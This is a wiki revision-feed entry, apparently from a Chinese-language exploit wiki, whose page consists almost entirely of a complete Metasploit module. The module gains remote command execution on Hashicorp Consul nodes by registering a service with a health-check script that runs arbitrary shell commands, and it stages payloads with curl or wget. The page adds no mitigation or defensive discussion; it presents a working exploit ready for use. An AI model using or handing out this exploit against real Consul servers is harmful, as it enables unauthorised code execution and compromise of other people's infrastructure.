https://pwnwiki.com/index.php?action=history&feed=atom&title=Hashicorp_Consul_Services_API_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Hashicorp Consul Services API 遠程代碼執行漏洞 - Revision history
2026-04-16T06:49:34Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Hashicorp_Consul_Services_API_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1500&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule..."
2021-04-11T01:13:22Z
<p>Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Remote<br />
Rank = ExcellentRanking<br />
<br />
include Msf::Exploit::Remote::HttpClient<br />
include Msf::Exploit::CmdStager<br />
<br />
def initialize(info={})<br />
super(update_info(info,<br />
'Name' => "Hashicorp Consul Remote Command Execution via Services API",<br />
'Description' => %q{<br />
This module exploits Hashicorp Consul's services API to gain remote command<br />
execution on Consul nodes.<br />
},<br />
'License' => MSF_LICENSE,<br />
'Author' =><br />
[<br />
'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC<br />
'Francis Alexander <helofrancis[at]gmail.com >', # Discovery and PoC<br />
'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module<br />
],<br />
'References' =><br />
[<br />
[ 'URL', 'https://www.consul.io/api/agent/service.html' ],<br />
[ 'URL', 'https://github.com/torque59/Garfield' ]<br />
],<br />
'Platform' => 'linux',<br />
'Targets' => [ [ 'Linux', {} ] ],<br />
'Payload' => {},<br />
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'],<br />
'Privileged' => false,<br />
'DefaultTarget' => 0,<br />
'DisclosureDate' => 'Aug 11 2018'))<br />
register_options(<br />
[<br />
OptString.new('TARGETURI', [true, 'The base path', '/']),<br />
OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),<br />
OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),<br />
Opt::RPORT(8500)<br />
])<br />
end<br />
<br />
def check<br />
res = send_request_cgi({<br />
'method' => 'GET',<br />
'uri' => normalize_uri(target_uri.path, '/v1/agent/self'),<br />
'headers' => {<br />
'X-Consul-Token' => datastore['ACL_TOKEN']<br />
}<br />
})<br />
<br />
unless res<br />
vprint_error 'Connection failed'<br />
return CheckCode::Unknown<br />
end<br />
<br />
unless res.code == 200<br />
vprint_error 'Unexpected reply'<br />
return CheckCode::Safe<br />
end<br />
<br />
agent_info = JSON.parse(res.body)<br />
<br />
if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true<br />
return CheckCode::Vulnerable<br />
end<br />
<br />
CheckCode::Safe<br />
rescue JSON::ParserError<br />
vprint_error 'Failed to parse JSON output.'<br />
return CheckCode::Unknown<br />
end<br />
<br />
def execute_command(cmd, opts = {})<br />
uri = target_uri.path<br />
service_name = Rex::Text.rand_text_alpha(5..10)<br />
print_status("Creating service '#{service_name}'")<br />
<br />
# NOTE: Timeout defines how much time the check script will run until<br />
# getting killed. Arbitrarily set to one day for now.<br />
res = send_request_cgi({<br />
'method' => 'PUT',<br />
'uri' => normalize_uri(uri, 'v1/agent/service/register'),<br />
'headers' => {<br />
'X-Consul-Token' => datastore['ACL_TOKEN']<br />
},<br />
'ctype' => 'application/json',<br />
'data' => {<br />
:ID => "#{service_name}",<br />
:Name => "#{service_name}",<br />
:Address => "127.0.0.1",<br />
:Port => 80,<br />
:check => {<br />
:script => "#{cmd}",<br />
:Args => ["sh", "-c", "#{cmd}"],<br />
:interval => "10s",<br />
:Timeout => "86400s"<br />
}<br />
}.to_json<br />
})<br />
unless res && res.code == 200<br />
fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Consul API.')<br />
end<br />
print_status("Service '#{service_name}' successfully created.")<br />
print_status("Waiting for service '#{service_name}' script to trigger")<br />
sleep(12)<br />
print_status("Removing service '#{service_name}'")<br />
res = send_request_cgi({<br />
'method' => 'PUT',<br />
'uri' => normalize_uri(<br />
uri,<br />
"v1/agent/service/deregister/#{service_name}"<br />
),<br />
'headers' => {<br />
'X-Consul-Token' => datastore['ACL_TOKEN']<br />
}<br />
})<br />
if res && res.code != 200<br />
fail_with(Failure::UnexpectedReply,<br />
'An error occured when contacting the Consul API.'<br />
)<br />
end<br />
end<br />
<br />
def exploit<br />
execute_cmdstager()<br />
end<br />
end<br />
<br />
</pre></div>
Pwnwiki